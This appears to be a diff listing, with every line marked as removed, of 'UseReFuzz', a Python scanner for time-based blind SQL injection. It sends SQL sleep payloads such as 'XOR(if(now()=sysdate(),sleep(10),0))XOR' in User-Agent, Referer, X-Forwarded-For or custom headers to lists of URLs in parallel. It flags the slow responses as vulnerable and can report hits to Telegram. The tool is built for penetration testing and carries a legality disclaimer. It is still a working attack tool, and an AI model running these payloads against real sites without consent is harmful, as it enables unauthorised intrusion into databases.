65	-	parser.add_argument('-p','--proxy', type=str,help=f'✈️ _Burp proxy or any other proxy to send the request \t \t{bcolors.BOLD} {bcolors.OKBLUE} -p http://127.1:8080{bcolors.ENDC}',default="NO_PROXY")
66	-	parser.add_argument('-m','--message', type=str,help=f'✉️ _Send a message in header for ease of search in Burp history \t \t{bcolors.BOLD} {bcolors.OKBLUE} -m "Just Testing SQLI"{bcolors.ENDC}',default="Testing for SQLI in User-Agent and Referer Header")
67	-	parser.add_argument('-s','--sleep', type=int,help=f'😴_How much sleep is used in your custom payload \t \t{bcolors.BOLD} {bcolors.OKBLUE} -s 12 {bcolors.ENDC} Default Sleep = 10' , default=10)
68	-	parser.add_argument('-v','--verbose', help=f'💣_Display All URLs and output \t \t{bcolors.BOLD} {bcolors.OKBLUE} -v {bcolors.ENDC}', action='store_true' , default=False)
69	-	parser.add_argument('-t','--telify', help=f'💬_Notify on telegram (https://github.com/root-tanishq/telify configuration file required) \t \t{bcolors.BOLD} {bcolors.OKBLUE} -t {bcolors.ENDC}', action='store_true' , default=False)
70	-	parser.add_argument('-o','--output', type=str,help=f'📁_Save the vulnerable URLs to an output file \t \t{bcolors.BOLD} {bcolors.OKBLUE} -o savefile {bcolors.ENDC}', default="NO_OUTPUT")
71	-	parser.add_argument('-u','--url', type=str,help=f'🤖_Pass a URL to check for Header SQLI Injections \t \t{bcolors.BOLD} {bcolors.OKBLUE} -u http://domain.tld/index.php {bcolors.ENDC}', default='NO_URL')
72	-	parser.add_argument('-ch','--customerheader', type=str,help=f'🔒_Custom Header for SQLI Injections \t \t{bcolors.BOLD} {bcolors.OKBLUE} -ch X-Auth {bcolors.ENDC}', default="NO_CUSTOM_HEADER")
73	-	parser.add_argument('-w','--workers', type=int,help=f'👷_No. of workers (Processes) at a time \t \t{bcolors.BOLD} {bcolors.OKBLUE}-w 10 {bcolors.ENDC}\t \t Default Workers = 5',default=5)
74	-	parser.add_argument('-i','--inject', type=str,help=f"""💉_Send your custom payload for SQL Injection \t \t{bcolors.BOLD} {bcolors.OKBLUE} -i "'+sleep(10)+'"{bcolors.ENDC} """ , default='"XOR(if(now()=sysdate(),sleep(10),0))XOR"')
75	-	args = parser.parse_args()
76	-
77	-	if args.telify:
78	-	try:
79	-	config = configparser.ConfigParser()
80	-	config.read(os.path.join(os.path.expanduser( '~' ),'telify.ini'))
81	-	CHAT_ID = config['TELIFY']['CHATID']
82	-	API_TOKEN = config['TELIFY']['APITOKEN']
83	-	telifyurl = f'https://api.telegram.org/bot{API_TOKEN}/sendMessage'
84	-	requests.post(telifyurl, json={'chat_id': CHAT_ID, 'text': f'[💡] (USEREFUZZ) Runned on (⏲️) {datetime.datetime.now()} ⏬'})
85	-	except:
86	-	print(f"😺{bcolors.WARNING}_No Configuration found , setup telify now => {bcolors.ENDC}{bcolors.BOLD} https://github.com/root-tanishq/telify {bcolors.ENDC}")
87	-
88	-	if args.output != "NO_OUTPUT":
89	-	print(f'{bcolors.BOLD} 📂 Logging Output of Vulnerable URLs to => {args.output}.md \n')
90	-	file = open(args.output + ".md","w")
91	-	file.write(f"""
92	-	# UseReFuzz HEADER SQLI INJECTION REPORT
93	-
94	-	## Author - Tanishq Rathore (Kun)
95	-	## Github - https://github.com/root-tanishq/userefuzz
96	-	## Twitter - https://twitter.com/root_tanishq
97	-
98	-	> UseReFuzz runned on `{datetime.datetime.now()}`
99	-
100	-	## Legality
101	-
102	-	```
103	-	Usage of userefuzz for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
104	-	```
105	-
106	-	- Payload Used `{args.inject}`
107	-
108	-	- Sleep used for checking `{args.sleep}`
109	-
110	-	# Report Results
111	-	\| TIME TAKEN \| URL \| IS VULNERABLE \|
112	-	\| --- \| --- \| --- \|
113	-	""")
114	-	file.close()
115	-	fileappend = open(args.output + ".md" , "a")
116	-
117	-	def header_injector(url):
118	-	if args.customerheader != 'NO_CUSTOM_HEADER':
119	-	header = { args.customerheader : args.inject , 'UseReFuzz':args.message }
120	-	else:
121	-	header = {'User-Agent':args.inject , 'Referer': args.inject , 'X-Forwarded-For':args.inject , 'UseReFuzz':args.message }
122	-	proxy = { 'http': args.proxy , 'https': args.proxy }
123	-	sess = requests.Session()
124	-	resp = sess.get(url , headers=header , verify=False)
125	-	resp_time = resp.elapsed.total_seconds()
126	-	try:
127	-	if resp_time >= args.sleep-1:
128	-	if args.proxy != 'NO_PROXY':
129	-	try:
130	-	sess.get(url , headers=header , verify=False , proxies=proxy , timeout=0.000000000001)
131	-	except:
132	-	pass
133	-	print(f'{bcolors.OKGREEN}{bcolors.BOLD}[💉P{bcolors.ENDC}{bcolors.OKGREEN}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.OKGREEN} ] URL => {bcolors.ENDC}', url)
134	-	else:
135	-	print(f'{bcolors.OKGREEN}{bcolors.BOLD}[💉💉{bcolors.ENDC}{bcolors.OKGREEN}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.OKGREEN} ] URL => {bcolors.ENDC}', url)
136	-	if args.output != "NO_OUTPUT":
137	-	fileappend.write(f'\| {resp_time} \| "{url}" \| 💉True \|\n')
138	-	fileappend.flush()
139	-	if args.telify:
140	-	telifyurl = f'https://api.telegram.org/bot{API_TOKEN}/sendMessage'
141	-	requests.post(telifyurl, json={'chat_id': CHAT_ID, 'text': f'[💎] (USEREFUZZ)⛓️URL(💻)⛓️ {url} ⛓️RESPONSE TIME(⏲️)⛓️ {resp_time}'})
142	-	else:
143	-	if args.verbose:
144	-	print(f'{bcolors.FAIL}{bcolors.BOLD}[{bcolors.ENDC}NV{bcolors.ENDC}{bcolors.FAIL}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.FAIL} ] URL => {bcolors.ENDC}', url)
145	-	if args.output != "NO_OUTPUT":
146	-	fileappend.write(f'\| {resp_time} \| "{url}" \| False \|\n')
147	-	fileappend.flush()
148	-	except:
149	-	if args.verbose:
150	-	print(f'{bcolors.FAIL}{bcolors.BOLD}[{bcolors.ENDC}NV{bcolors.ENDC}{bcolors.FAIL}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.FAIL} ] URL => {bcolors.ENDC}', url)
151	-	if args.output != "NO_OUTPUT":
152	-	fileappend.write(f'\| {resp_time} \| "{url}" \| False \|\n')
153	-	fileappend.flush()
154	-
155	-
156	-	def main():
157	-	if args.url != "NO_URL":
158	-	header_injector(args.url)
159	-	elif args.list != "NO_LIST":
160	-	try:
161	-	urllist = filter(None , open(args.list,'r').read().split("\n"))
162	-	with mp.Pool(args.workers) as worker:
163	-	worker.map(header_injector , urllist)
164	-	except KeyboardInterrupt:
165	-	exit(0)
166	-	except:
167	-	if os.path.isfile(args.list):
168	-	exit(0)
169	-	else:
170	-	print(f'😥{bcolors.BOLD}{bcolors.FAIL}_We are unable to read the file or the file does not exist{bcolors.ENDC}')
171	-	elif not sys.stdin.isatty():
172	-	try:
173	-	urlfile = []
174	-	for line in sys.stdin:
175	-	try:
176	-	urlfile.append(line.split()[0])
177	-	except:
178	-	pass
179	-	with mp.Pool(args.workers) as worker:
180	-	worker.map(header_injector , urlfile)
181	-	except KeyboardInterrupt:
182	-	exit(0)
183	-	except:
184	-	exit(0)
185	-	else:
186	-	print(f"😺{bcolors.WARNING}_No Option Provided please check {bcolors.ENDC}{bcolors.BOLD}# {sys.argv[0]} --help {bcolors.ENDC}")
187	-	if args.output != "NO_OUTPUT":
188	-	fileappend.close()
189	-
190	-
191	-	main()
192	-

userefuzz_v2.1